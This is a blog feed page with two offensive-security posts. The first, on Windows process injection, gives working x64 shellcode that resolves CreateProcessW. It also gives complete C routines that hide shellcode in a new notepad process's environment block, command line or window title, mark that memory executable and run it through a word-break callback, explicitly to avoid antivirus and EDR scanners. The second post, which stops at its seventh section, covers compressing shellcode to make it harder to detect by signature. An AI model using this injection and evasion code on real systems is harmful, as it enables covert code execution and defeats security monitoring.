❌

Normal view

There are new articles available, click to refresh the page.
Before yesterdaymodexp

Windows Process Injection: Command Line and Environment Variables

By: odzhan
31 July 2020 at 04:00

Windows Process Injection: Command Line and Environment Variables

Contents

  1. Introduction
  2. Shellcode
  3. Environment Variables
  4. Command Line
  5. Window Title
  6. Runtime Data

1. Introduction

There are many ways to load shellcode into the address space of a process, but knowing precisely where it’s stored in memory is a bigger problem when we need to execute it. Ideally, a Red Teamer will want to locate their code with the least amount of effort, avoiding memory scrapers/scanners that might alert an antivirus or EDR solution. Adam discussed some ways to avoid using VirtualAllocEx and WriteProcessMemory in a blog post, Inserting data into other processes’ address space. Red Teamers are known to create a new process before injecting data, but I’ve yet to see any examples of using the command line or environment variables to assist with this.

This post examines how CreateProcessW might be used to both start a new process AND inject data simultaneously. Memory for where the data resides will initially have Read-Write (RW) permissions, but this can be changed to Read-Write-Execute (RWX) using VirtualProtectEx. Since notepad will be used to demonstrate these techniques, Wordwarping / EM_SETWORDBREAKPROC is used to execute the shellcode. The main structure of memory being modified for these examples is RTL_USER_PROCESS_PARAMETERS that contains the Environment block, the CommandLine and C RuntimeData information, all of which can be controlled by an actor prior to creation of a new process.

typedef struct _RTL_USER_PROCESS_PARAMETERS {
    ULONG MaximumLength;                            //0x0
    ULONG Length;                                   //0x4
    ULONG Flags;                                    //0x8
    ULONG DebugFlags;                               //0xc
    PVOID ConsoleHandle;                            //0x10
    ULONG ConsoleFlags;                             //0x18
    PVOID StandardInput;                            //0x20
    PVOID StandardOutput;                           //0x28
    PVOID StandardError;                            //0x30
    CURDIR CurrentDirectory;                        //0x38
    UNICODE_STRING DllPath;                         //0x50
    UNICODE_STRING ImagePathName;                   //0x60
    UNICODE_STRING CommandLine;                     //0x70
    PVOID Environment;                              //0x80
    ULONG StartingX;                                //0x88
    ULONG StartingY;                                //0x8c
    ULONG CountX;                                   //0x90
    ULONG CountY;                                   //0x94
    ULONG CountCharsX;                              //0x98
    ULONG CountCharsY;                              //0x9c
    ULONG FillAttribute;                            //0xa0
    ULONG WindowFlags;                              //0xa4
    ULONG ShowWindowFlags;                          //0xa8
    UNICODE_STRING WindowTitle;                     //0xb0
    UNICODE_STRING DesktopInfo;                     //0xc0
    UNICODE_STRING ShellInfo;                       //0xd0
    UNICODE_STRING RuntimeData;                     //0xe0
    RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32];  //0xf0
    ULONG EnvironmentSize;                          //0x3f0
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS; 

2. Shellcode

User-supplied shellcodes that contain two consecutive null bytes (\x00\x00) would require an encoder and decoder, such as Base64. The following code resolves the address of CreateProcessW and executes a command supplied by the word break callback. The PoC will set the command using WM_SETTEXT.

      bits 64
      
Β Β Β Β Β Β %include "include.inc"
      
      struc stk_mem
        .hs                   resb home_space_size
        
        .bInheritHandles      resq 1
        .dwCreationFlags      resq 1
        .lpEnvironment        resq 1
        .lpCurrentDirectory   resq 1
        .lpStartupInfo        resq 1
        .lpProcessInformation resq 1
        
        .procinfo             resb PROCESS_INFORMATION_size
        .startupinfo          resb STARTUPINFO_size
      endstruc

Β Β Β Β Β Β %define stk_size ((stk_mem_size + 15) & -16) - 8
      
Β Β Β Β Β Β %ifndef BIN
        global createproc
Β Β Β Β Β Β %endif
      
      ; void createproc(WCHAR cmd[]);
createproc:
      ; save non-volatile registers
      pushx  rsi, rbx, rdi, rbp
      
      ; allocate stack memory for arguments + home space
      xor    eax, eax
      mov    al, stk_size
      sub    rsp, rax
      
      ; save pointer to buffer
      push   rcx
      
      push   TEB.ProcessEnvironmentBlock
      pop    r11
      mov    rax, [gs:r11]
      mov    rax, [rax+PEB.Ldr]
      mov    rdi, [rax+PEB_LDR_DATA.InLoadOrderModuleList + LIST_ENTRY.Flink]
      jmp    scan_dll
next_dll:    
      mov    rdi, [rdi+LDR_DATA_TABLE_ENTRY.InLoadOrderLinks + LIST_ENTRY.Flink]
scan_dll:
      mov    rbx, [rdi+LDR_DATA_TABLE_ENTRY.DllBase]

      mov    esi, [rbx+IMAGE_DOS_HEADER.e_lfanew]
      add    esi, r11d             ; add 60h or TEB.ProcessEnvironmentBlock
      ; ecx = IMAGE_DATA_DIRECTORY[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress
      mov    ecx, [rbx+rsi+IMAGE_NT_HEADERS.OptionalHeader + \
                           IMAGE_OPTIONAL_HEADER.DataDirectory + \
                           IMAGE_DIRECTORY_ENTRY_EXPORT * IMAGE_DATA_DIRECTORY_size + \
                           IMAGE_DATA_DIRECTORY.VirtualAddress - \
                           TEB.ProcessEnvironmentBlock]
      jecxz  next_dll              ; if no exports, try next DLL in list
      ; rsi = offset IMAGE_EXPORT_DIRECTORY.Name 
      lea    rsi, [rbx+rcx+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
      lodsd                        ; eax = NumberOfNames
      xchg   eax, ecx
      jecxz  next_dll              ; if no names, try next DLL in list
      
      ; r8 = IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
      lodsd
      xchg   eax, r8d              ;
      add    r8, rbx               ; r8 = RVA2VA(r8, rbx)
      ; ebp = IMAGE_EXPORT_DIRECTORY.AddressOfNames
      lodsd
      xchg   eax, ebp              ;
      add    rbp, rbx              ; rbp = RVA2VA(rbp, rbx)
      ; r9 = IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals      
      lodsd
      xchg   eax, r9d
      add    r9, rbx               ; r9 = RVA2VA(r9, rbx)
find_api:
      mov    esi, [rbp+rcx*4-4]    ; rax = AddressOfNames[rcx-1]
      add    rsi, rbx
      xor    eax, eax
      cdq
hash_api:
      lodsb
      add    edx, eax
      ror    edx, 8
      dec    al
      jns    hash_api
      cmp    edx, 0x1b929a47       ; CreateProcessW
      loopne find_api              ; loop until found or no names left
      
      jnz    next_dll              ; not found? goto next_dll
      
      movzx  eax, word[r9+rcx*2]   ; eax = AddressOfNameOrdinals[rcx]
      mov    eax, [r8+rax*4]
      add    rbx, rax              ; rbx += AddressOfFunctions[rdx]
      
      ; CreateProcess(NULL, cmd, NULL, NULL, 
      ;   FALSE, 0, NULL, &si, &pi);
      pop    rdx           ; lpCommandLine = buffer for Edit
      xor    r8, r8        ; lpProcessAttributes = NULL
      xor    r9, r9        ; lpThreadAttributes = NULL
      xor    eax, eax
      mov    [rsp+stk_mem.bInheritHandles     ], rax ; bInheritHandles      = FALSE
      mov    [rsp+stk_mem.dwCreationFlags     ], rax ; dwCreationFlags      = 0
      mov    [rsp+stk_mem.lpEnvironment       ], rax ; lpEnvironment        = NULL
      mov    [rsp+stk_mem.lpCurrentDirectory  ], rax ; lpCurrentDirectory   = NULL
      
      lea    rdi, [rsp+stk_mem.procinfo       ]
      mov    [rsp+stk_mem.lpProcessInformation], rdi ; lpProcessInformation = &pi

      lea    rdi, [rsp+stk_mem.startupinfo    ]
      mov    [rsp+stk_mem.lpStartupInfo       ], rdi ; lpStartupInfo        = &si
      
      xor    ecx, ecx
      push   STARTUPINFO_size
      pop    rax
      stosd                         ; si.cb = sizeof(STARTUPINFO)
      sub    rax, 4
      xchg   eax, ecx
      rep    stosb
      call   rbx
      
      ; deallocate stack
      xor    eax, eax
      mov    al, stk_size
      add    rsp, rax
      xor    eax, eax
      
      ; restore non-volatile registers
      popx   rsi, rbx, rdi, rbp  
      ret

3. Environment Variables

Part of Unix since 1979 and MS-DOS/Windows since 1982. According to MSDN, the maximum size of a user-defined variable is 32,767 characters. 32KB should be sufficient for most shellcode, but if not, you have the option of using multiple variables for anything else.

There’s a few ways to inject using variables, but I found the easiest approach to be setting one in the current process with SetEnvironmentVariable, and then allowing CreateProcessW to transfer or propagate all of them to the new process by setting the lpEnvironment parameter to NULL.

    // generate random name
    srand(time(0));
    for(i=0; i<MAX_NAME_LEN; i++) {
      name[i] = ((rand() % 2) ? L'a' : L'A') + (rand() % 26);
    }
    
    // set variable in this process space with our shellcode
    SetEnvironmentVariable(name, (PWCHAR)WINEXEC);
    
    // create a new process using 
    // environment variables from this process
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    
    CreateProcess(NULL, L"notepad", NULL, NULL, 
      FALSE, 0, NULL, NULL, &si, &pi);

Variable names are stored in memory alphabetically and will appear in the same order for the new process so long as lpEnvironment for CreateProcess is set to NULL. The PoC here will locate the address of the shellcode inside the current environment block, then subtract the base address to obtain the relative virtual address (RVA).

// return relative virtual address of environment block
DWORD get_var_rva(PWCHAR name) {
    PVOID  env;
    PWCHAR str, var;
    DWORD  rva = 0;
    
    // find the offset of value for environment variable
    env = NtCurrentTeb()->ProcessEnvironmentBlock->ProcessParameters->Environment;
    str = (PWCHAR)env;
    
    while(*str != 0) {
      // our name?
      if(wcsncmp(str, name, MAX_NAME_LEN) == 0) {
        var = wcsstr(str, L"=") + 1;
        // calculate RVA of value
        rva = (PBYTE)var - (PBYTE)env;
        break;
      }
      // advance to next entry
      str += wcslen(str) + 1;
    }
    return rva;
}

Once we have the RVA for local process, read the address of environment block in remote process and add the RVA.

// get the address of environment block
PVOID var_get_env(HANDLE hp, PDWORD envlen) {
    NTSTATUS                    nts;
    PROCESS_BASIC_INFORMATION   pbi;
    RTL_USER_PROCESS_PARAMETERS upp;
    PEB                         peb;
    ULONG                       len;
    SIZE_T                      rd;

    // get the address of PEB
    nts = NtQueryInformationProcess(
        hp, ProcessBasicInformation,
        &pbi, sizeof(pbi), &len);
    
    // get the address RTL_USER_PROCESS_PARAMETERS
    ReadProcessMemory(
      hp, pbi.PebBaseAddress,
      &peb, sizeof(PEB), &rd);
    
    // get the address of Environment block 
    ReadProcessMemory(
      hp, peb.ProcessParameters,
      &upp, sizeof(RTL_USER_PROCESS_PARAMETERS), &rd);

    *envlen = upp.EnvironmentSize;
    return upp.Environment;
}

The full routine will copy the user-supplied command to the Edit control and the shellcode will receive this when the word break callback is executed. You don’t need to use Notepad, but I just wanted to avoid the usual methods of executing code via RtlCreateUserThread or CreateRemoteThread. Figure 1 shows the shellcode stored as an environment variable. See var_inject.c for more detals.

Figure 1. Environment variable of new process containing shellcode.

void var_inject(PWCHAR cmd) {
    STARTUPINFO         si;
    PROCESS_INFORMATION pi;
    WCHAR               name[MAX_PATH]={0};    
    INT                 i; 
    PVOID               va;
    DWORD               rva, old, len;
    PVOID               env;
    HWND                npw, ecw;

    // generate random name
    srand(time(0));
    for(i=0; i<MAX_NAME_LEN; i++) {
      name[i] = ((rand() % 2) ? L'a' : L'A') + (rand() % 26);
    }
    
    // set variable in this process space with our shellcode
    SetEnvironmentVariable(name, (PWCHAR)WINEXEC);
    
    // create a new process using 
    // environment variables from this process
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    
    CreateProcess(NULL, L"notepad", NULL, NULL, 
      FALSE, 0, NULL, NULL, &si, &pi);
     
    // wait for process to initialize
    // if you don't wait, there can be a race condition
    // reading the correct Environment address from new process    
    WaitForInputIdle(pi.hProcess, INFINITE);
    
    // the command to execute is just pasted into the notepad
    // edit control.
    npw = FindWindow(L"Notepad", NULL);
    ecw = FindWindowEx(npw, NULL, L"Edit", NULL);
    SendMessage(ecw, WM_SETTEXT, 0, (LPARAM)cmd);
    
    // get the address of environment block in new process
    // then calculate the address of shellcode
    env = var_get_env(pi.hProcess, &len);
    va = (PBYTE)env + get_var_rva(name);

    // set environment block to RWX
    VirtualProtectEx(pi.hProcess, env, 
      len, PAGE_EXECUTE_READWRITE, &old);

    // execute shellcode
    SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)va);
    SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
    SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);
    
cleanup:
    // cleanup and exit
    SetEnvironmentVariable(name, NULL);
    
    if(pi.hProcess != NULL) {
      CloseHandle(pi.hThread);
      CloseHandle(pi.hProcess);
    }
}

4. Command Line

This can be easier to work with than environment variables. For this example, only the shellcode itself is used and that can be located easily in the PEB.

    #define NOTEPAD_PATH L"%SystemRoot%\\system32\\notepad.exe"

    ExpandEnvironmentStrings(NOTEPAD_PATH, path, MAX_PATH);
    
    // create a new process using shellcode as command line
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    
    CreateProcess(path, (PWCHAR)WINEXEC, NULL, NULL, 
      FALSE, 0, NULL, NULL, &si, &pi);

Reading is much the same as reading environment variables since they both reside inside RTL_USER_PROCESS_PARAMETERS.

// get the address of command line
PVOID get_cmdline(HANDLE hp, PDWORD cmdlen) {
    NTSTATUS                    nts;
    PROCESS_BASIC_INFORMATION   pbi;
    RTL_USER_PROCESS_PARAMETERS upp;
    PEB                         peb;
    ULONG                       len;
    SIZE_T                      rd;

    // get the address of PEB
    nts = NtQueryInformationProcess(
        hp, ProcessBasicInformation,
        &pbi, sizeof(pbi), &len);
    
    // get the address RTL_USER_PROCESS_PARAMETERS
    ReadProcessMemory(
      hp, pbi.PebBaseAddress,
      &peb, sizeof(PEB), &rd);
    
    // get the address of command line 
    ReadProcessMemory(
      hp, peb.ProcessParameters,
      &upp, sizeof(RTL_USER_PROCESS_PARAMETERS), &rd);

    *cmdlen = upp.CommandLine.Length;
    return upp.CommandLine.Buffer;
}

Figure 2 illustrates what Process Explorer might show for the new process. See cmd_inject.c for more detals.

Figure 2. Command line of new process containing shellcode.

#define NOTEPAD_PATH L"%SystemRoot%\\system32\\notepad.exe"

void cmd_inject(PWCHAR cmd) {
    STARTUPINFO         si;
    PROCESS_INFORMATION pi;
    WCHAR               path[MAX_PATH]={0};
    DWORD               rva, old, len;
    PVOID               cmdline;
    HWND                npw, ecw;

    ExpandEnvironmentStrings(NOTEPAD_PATH, path, MAX_PATH);
    
    // create a new process using shellcode as command line
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    
    CreateProcess(path, (PWCHAR)WINEXEC, NULL, NULL, 
      FALSE, 0, NULL, NULL, &si, &pi);
     
    // wait for process to initialize
    // if you don't wait, there can be a race condition
    // reading the correct command line from new process  
    WaitForInputIdle(pi.hProcess, INFINITE);
    
    // the command to execute is just pasted into the notepad
    // edit control.
    npw = FindWindow(L"Notepad", NULL);
    ecw = FindWindowEx(npw, NULL, L"Edit", NULL);
    SendMessage(ecw, WM_SETTEXT, 0, (LPARAM)cmd);
    
    // get the address of command line in new process
    // which contains our shellcode
    cmdline = get_cmdline(pi.hProcess, &len);
    
    // set the address to RWX
    VirtualProtectEx(pi.hProcess, cmdline, 
      len, PAGE_EXECUTE_READWRITE, &old);
    
    // execute shellcode
    SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)cmdline);
    SendMessage(ecw, WM_LBUTTONDBLCLK, MK_LBUTTON, (LPARAM)0x000a000a);
    SendMessage(ecw, EM_SETWORDBREAKPROC, 0, (LPARAM)NULL);
    
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
}

5. Window Title

IMHO, this is the best of three because the lpTitle field of STARTUPINFO only applies to console processes. If a GUI like notepad is selected, process explorer doesn’t show any unusual characters for various properties. Set lpTitle to the shellcode and CreateProcessW will inject. As with the other two methods, obtaining the address can be read via the PEB.

    // create a new process using shellcode as window title
    ZeroMemory(&si, sizeof(si));
    si.cb          = sizeof(si);
    si.dwFlags     = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOWDEFAULT;
    si.lpTitle     = (PWCHAR)WINEXEC;

6. Runtime Data

Two fields (cbReserved2 and lpReserved2) in the STARTUPINFO structure are, according to Microsoft, β€œReserved for use by the C Run-time” and must be NULL or zero prior to calling CreateProcess. The maximum amount of data that can be transferred into a new process is 65,536 bytes, but my experiment with it resulted in the new process failing to execute. The fault was in ucrtbase.dll likely because lpReserved2 didn’t point to the data it expected.

While it didn’t work for me, that’s not to say it can’t work with some additional tweaking. Sources

Shellcode: Data Compression

By: odzhan
8 December 2019 at 15:00

Introduction

This post examines data compression algorithms suitable for position-independent codes and assumes you’re already familiar with the concept and purpose of data compression. For those of you curious to know more about the science, or information theory, read Data Compression Explained by Matt Mahoney. For historical perspective, read History of Lossless Data Compression Algorithms. Charles Bloom has a great blog on the subject that goes way over my head. For questions and discussions, Encode’s Forum is popular among experts and should be able to help with any queries you have.

For shellcode, algorithms based on the following conditions are considered:

  1. Compact decompressor.
  2. Good compression ratio.
  3. Portable across operating systems and architectures.
  4. Difficult to detect by signature.
  5. Unencumbered by patents and licensing.

Meeting the requirements isn’t that easy. Search for β€œlightweight compression algorithms” and you’ll soon find recommendations for algorithms that aren’t compact at all. It’s not an issue on machines with 1TB hard drives of course. It’s a problem for resource-constrained environments like microcontrollers and wireless sensors. The best algorithms are usually optimized for speed. They contain arrays and constants that allow them to be easily identified with signature-based tools.

Algorithms that are compact might have suboptimal compression ratios. The compressor component is closed source or restricted by licensing. There is light at the end of the tunnel, however, thanks primarily to the efforts of those designing executable compression. First, we look at those algorithms and then what Windows API can be used as an alternative. There are open source libraries designed for interoperability that support Windows compression on other platforms like Linux.

Table of contents

  1. Executable Compression
  2. Windows NT Layer DLL
  3. Windows Compression API
  4. Windows Packaging API
  5. Windows Imaging API
  6. Direct3D HLSL Compiler
  7. Windows-internal libarchive library
  8. LibreSSL Cryptography Library
  9. Windows.Storage.Compression
  10. Windows Undocumented API
  11. Summary

1. Executable Compression

The first tool known to compress executables and save disk space was Realia SpaceMaker published sometime in 1982 by Robert Dewar. The first virus known to use compression in its infection routine was Cruncher published in June 1993. The author of Cruncher used routines from the disk reduction utility for DOS called DIET. Later on, many different viruses utilized compression as part of their infection routine to reduce the size of infected files, presumably to help evade detection longer. Although completely unrelated to shellcode, I decided to look at e-zines from twenty years ago when there was a lot of interest in using lightweight compression algorithms.

The following list of viruses used compression back in the late 90s/early 00s. It’s not an extensive list, as I only searched the more popular e-zines like 29A and Xine by iKX.

  • Redemption, by Jacky Qwerty/29A
  • Inca, Hybris, by Vecna/29A
  • Aldebaran, by Bozo/iKX
  • Legacy, Thorin, Rhapsody, Forever, by Billy Belcebu/iKX
  • BeGemot, HIV, Vulcano, Benny, Milennium, by Benny/29A
  • Junkmail, Junkhtmail, by roy g biv/29A/defjam

The following compression engines were examined. A 1MB EXE file was used as the raw data and not all of them were tested.

BCE that appeared in 29a#4 was disappointing with only an 8% compression ratio. BNCE that appeared in DCA#1 was no better at 9%, although the decompressor is only 54 bytes. The decompressor for LSCE is 25 bytes, but the compressor simply encodes repeated sequences of zero and nothing else. JQCoding has a ~20% compression ratio while LZCE provides the best at 36%. With exception to the last two mentioned, I was unable to find anything in the e-zines with a good compression ratio. They were super tiny, but also super eh..inefficient. Worth a mention is KITTY, by snowcat.

While I could be wrong, the earliest example of compression being used to unpack shellcode can be found in a generator written by Z0MBiE/29A in 2004. (shown in figure 1). NRV compression algorithms, similar to what’s used in UPX, were re-purposed to decompress the shellcode (see freenrv2 for more details).

Figure 1: Shellcode constructor by Z0MBiE/29A

UPX is a very popular tool for executable compression based on UCL. Included with the source is a PE packer example called UCLpack (thanks Peter) which is ideal for shellcode, too. aPLib also provides good compression ratio and the decompressor doesn’t contain lots of unique constants that would assist in detection by signature. The problem is that the compressor isn’t open source and requires linking with static or dynamic libraries compiled by the author. Thankfully, an open-source implementation by Emmanuel Marty is available and this is also ideal for shellcode.

Other libraries worth mentioning that I didn’t think were entirely suitable are Tiny Inflate and uzlib. The rest of this post focuses on compression provided by various Windows API.

2. Windows NT Layer DLL

Used by the Sofacy group to decompress a payload, RtlDecompressBuffer is also popular for PE Packers and in-memory execution. rtlcompress.c demonstrates using the API.

  • Compression

Obtain the size of the workspace required for compression via the RtlGetCompressionWorkSpaceSize API. Allocate memory for the compressed data and pass both memory buffer and the raw data to RtlCompressBuffer. The following example in C demonstrates this.

DWORD CompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {      
    ULONG                            wspace, fspace;
    SIZE_T                           outlen;
    DWORD                            len;
    NTSTATUS                         nts;
    PVOID                            ws, outbuf;
    HMODULE                          m;
    RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
    RtlCompressBuffer_t              RtlCompressBuffer;
      
    m = GetModuleHandle("ntdll");
    RtlGetCompressionWorkSpaceSize = (RtlGetCompressionWorkSpaceSize_t)GetProcAddress(m, "RtlGetCompressionWorkSpaceSize");
    RtlCompressBuffer              = (RtlCompressBuffer_t)GetProcAddress(m, "RtlCompressBuffer");
        
    if(RtlGetCompressionWorkSpaceSize == NULL || RtlCompressBuffer == NULL) {
      printf("Unable to resolve RTL API\n");
      return 0;
    }
        
    // 1. obtain the size of workspace
    nts = RtlGetCompressionWorkSpaceSize(
      engine | COMPRESSION_ENGINE_MAXIMUM, 
      &wspace, &fspace);
          
    if(nts == 0) {
      // 2. allocate memory for workspace
      ws = malloc(wspace); 
      if(ws != NULL) {
        // 3. allocate memory for output 
        outbuf = malloc(inlen);
        if(outbuf != NULL) {
          // 4. compress data
          nts = RtlCompressBuffer(
            engine | COMPRESSION_ENGINE_MAXIMUM, 
            inbuf, inlen, outbuf, inlen, 0, 
            (PULONG)&outlen, ws); 
              
          if(nts == 0) {
            // 5. write the original length
            WriteFile(outfile, &inlen, sizeof(DWORD), &len, 0);
            // 6. write compressed data to file
            WriteFile(outfile, outbuf, outlen, &len, 0);
          }
          // 7. free output buffer
          free(outbuf);
        }
        // 8. free workspace
        free(ws);
      }
    }
    return outlen;
}
  • Decompression

LZNT1 and Xpress data can be unpacked using RtlDecompressBuffer, however, Xpress Huffman data can only be unpacked using RtlDecompressBufferEx or the multi-threaded RtlDecompressBufferEx2. The last two require a WorkSpace buffer.

    typedef NTSTATUS (WINAPI *RtlDecompressBufferEx_t)(
      USHORT                 CompressionFormatAndEngine,
      PUCHAR                 UncompressedBuffer,
      ULONG                  UncompressedBufferSize,
      PUCHAR                 CompressedBuffer,
      ULONG                  CompressedBufferSize,
      PULONG                 FinalUncompressedSize,
      PVOID                  WorkSpace);
      
DWORD DecompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    ULONG                            wspace, fspace;
    SIZE_T                           outlen = 0;
    DWORD                            len;
    NTSTATUS                         nts;
    PVOID                            ws, outbuf;
    HMODULE                          m;
    RtlGetCompressionWorkSpaceSize_t RtlGetCompressionWorkSpaceSize;
    RtlDecompressBufferEx_t          RtlDecompressBufferEx;
      
    m = GetModuleHandle("ntdll");
    RtlGetCompressionWorkSpaceSize = (RtlGetCompressionWorkSpaceSize_t)GetProcAddress(m, "RtlGetCompressionWorkSpaceSize");
    RtlDecompressBufferEx          = (RtlDecompressBufferEx_t)GetProcAddress(m, "RtlDecompressBufferEx");
        
    if(RtlGetCompressionWorkSpaceSize == NULL || RtlDecompressBufferEx == NULL) {
      printf("Unable to resolve RTL API\n");
      return 0;
    }
        
    // 1. obtain the size of workspace
    nts = RtlGetCompressionWorkSpaceSize(
      engine | COMPRESSION_ENGINE_MAXIMUM, 
      &wspace, &fspace);
          
    if(nts == 0) {
      // 2. allocate memory for workspace
      ws = malloc(wspace); 
      if(ws != NULL) {
        // 3. allocate memory for output
        outlen = *(DWORD*)inbuf;
        outbuf = malloc(outlen);
        
        if(outbuf != NULL) {
          // 4. decompress data
          nts = RtlDecompressBufferEx(
            engine | COMPRESSION_ENGINE_MAXIMUM, 
            outbuf, outlen, 
            (PBYTE)inbuf + sizeof(DWORD), inlen - sizeof(DWORD), 
            (PULONG)&outlen, ws); 
              
          if(nts == 0) {
            // 5. write decompressed data to file
            WriteFile(outfile, outbuf, outlen, &len, 0);
          } else {
            printf("RtlDecompressBufferEx failed with %08lx\n", nts);
          }
          // 6. free output buffer
          free(outbuf);
        } else {
          printf("malloc() failed\n");
        }
        // 7. free workspace
        free(ws);
      }
    }
    return outlen;
}

3. Windows Compression API

Despite being well documented and offering better compression ratios than RtlCompressBuffer, it’s unusual to see these API used at all. Four engines are supported: MSZIP, Xpress, Xpress Huffman and LZMS. To demonstrate using these API, see xpress.c

Compression

DWORD CompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    COMPRESSOR_HANDLE ch = NULL;
    BOOL              r;
    SIZE_T            outlen, len;
    LPVOID            outbuf;
    DWORD             wr;
    
    // Create a compressor
    r = CreateCompressor(engine, NULL, &ch);
    
    if(r) {    
      // Query compressed buffer size.
      Compress(ch, inbuf, inlen, NULL, 0, &len);      
      if(GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
        // allocate memory for compressed data
        outbuf = malloc(len);
        if(outbuf != NULL) {
          // Compress data and write data to outbuf.
          r = Compress(ch, inbuf, inlen, outbuf, len, &outlen);
          // if compressed ok, write to file
          if(r) {
            WriteFile(outfile, outbuf, outlen, &wr, NULL);
          } else xstrerror("Compress()");
          free(outbuf);
        } else xstrerror("malloc()");
      } else xstrerror("Compress()");
      CloseCompressor(ch);
    } else xstrerror("CreateCompressor()");
    return r;
}

Decompression

DWORD DecompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
    DECOMPRESSOR_HANDLE dh = NULL;
    BOOL                r;
    SIZE_T              outlen, len;
    LPVOID              outbuf;
    DWORD               wr;
    
    // Create a decompressor
    r = CreateDecompressor(engine, NULL, &dh);
    
    if(r) {    
      // Query Decompressed buffer size.
      Decompress(dh, inbuf, inlen, NULL, 0, &len);      
      if(GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
        // allocate memory for decompressed data
        outbuf = malloc(len);
        if(outbuf != NULL) {
          // Decompress data and write data to outbuf.
          r = Decompress(dh, inbuf, inlen, outbuf, len, &outlen);
          // if decompressed ok, write to file
          if(r) {
            WriteFile(outfile, outbuf, outlen, &wr, NULL);
          } else xstrerror("Decompress()");
          free(outbuf);
        } else xstrerror("malloc()");
      } else xstrerror("Decompress()");
      CloseDecompressor(dh);
    } else xstrerror("CreateDecompressor()");
    return r;
}

4. Windows Packaging API

If you’re a developer that wants to sell a Windows application to customers on the Microsoft Store, you must submit a package that uses the Open Packaging Conventions (OPC) format. Visual Studio automates building packages (.msix or .appx) and bundles (.msixbundle or .appxbundle). There’s also a well documented interface (IAppxFactory) that allows building them manually. While not intended to be used specifically for compression, there’s no reason why you can’t. An SDK sample to extract the contents of packages uses SHCreateStreamOnFileEx to read the package from disk. However, you can also use SHCreateMemStream and decompress a package entirely in memory.

5. Windows Imaging API (WIM)

These encode and decode .wim files on disk. WIMCreateFile internally calls CreateFile to return a file handle to an archive that’s then used with WIMCaptureImage to compress and add files to the archive. From what I can tell, there’s no way to work with .wim files in memory using these API.

For Linux, the Windows Imaging (WIM) library supports Xpress, LZX and LZMS algorithms. libmspack and this repo provide good information on the various compression algorithms supported by Windows.

6. Direct3D HLSL Compiler

Believe it or not, the best compression ratio on Windows is provided by the Direct3D API. Internally, they use the DXT/Block Compression (BC) algorithms, which are designed specifically for textures/images. The algorithms provide higher quality compression rates than anything else available on Windows. The compression ratio was 60% for a 1MB EXE file and using the API is very easy. The following example in C uses D3DCompressShaders and D3DDecompressShaders. While untested, I believe OpenGL API could likely be used in a similar way.

Compression

#pragma comment(lib, "D3DCompiler.lib")
#include <d3dcompiler.h>
uint32_t d3d_compress(const void *inbuf, uint32_t inlen) {
    
    D3D_SHADER_DATA dsa;
    HRESULT         hr;
    ID3DBlob        *blob;
    SIZE_T          outlen = 0;
    LPVOID          outbuf;
    HANDLE          file;
    DWORD           len;
    
    file = CreateFile("compressed.bin", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if(file == INVALID_HANDLE_VALUE) return 0;
    
    dsa.pBytecode      = inbuf;
    dsa.BytecodeLength = inlen;
    
    // compress data
    hr = D3DCompressShaders(1, &dsa, D3D_COMPRESS_SHADER_KEEP_ALL_PARTS, &blob);
    if(hr == S_OK) {
      // write to file
      outlen = blob->lpVtbl->GetBufferSize(blob);
      outbuf = blob->lpVtbl->GetBufferPointer(blob);
      
      WriteFile(file, outbuf, outlen, &len, 0);
      blob->lpVtbl->Release(blob);
    }
    CloseHandle(file);
    return outlen;
}

Decompression

uint32_t d3d_decompress(const void *inbuf, uint32_t inlen) {
    D3D_SHADER_DATA dsa;
    HRESULT         hr;
    ID3DBlob        *blob;
    SIZE_T          outlen = 0;
    LPVOID          outbuf;
    HANDLE          file;
    DWORD           len;
    
    // create file to save decompressed data to
    file = CreateFile("decompressed.bin", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if(file == INVALID_HANDLE_VALUE) return 0;
    
    dsa.pBytecode      = inbuf;
    dsa.BytecodeLength = inlen;
    
    // decompress buffer
    hr = D3DDecompressShaders(inbuf, inlen, 1, 0, 0, 0, &blob, NULL);
    if(hr == S_OK) {
      // write to file
      outlen = blob->lpVtbl->GetBufferSize(blob);
      outbuf = blob->lpVtbl->GetBufferPointer(blob);
      
      WriteFile(file, outbuf, outlen, &len, 0);
      blob->lpVtbl->Release(blob);
    }
    CloseHandle(file);
    return outlen;    
}

The main problem with dynamically resolving these API is knowing what version is installed. The file name on my Windows 10 system is β€œD3DCompiler_47.dll”. It will likely be different on legacy systems.

7. Windows-internal libarchive library

